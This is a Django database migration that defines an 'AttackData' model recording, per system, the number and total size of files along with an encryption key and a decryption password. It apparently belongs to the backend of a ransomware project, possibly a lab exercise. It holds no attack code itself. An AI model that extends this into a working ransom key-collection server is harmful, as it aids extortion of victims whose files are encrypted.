# Generated by Django 4.2.5 on 2023-09-06 16:19

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='AttackData',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('NumberOfFiles', models.IntegerField()),
                ('TotalFilesSize', models.IntegerField()),
                ('EncryptionKey', models.BinaryField(max_length=100)),
                ('SystemName', models.CharField(max_length=100)),
                ('DecryptionPassword', models.CharField(max_length=100)),
            ],
        ),
    ]
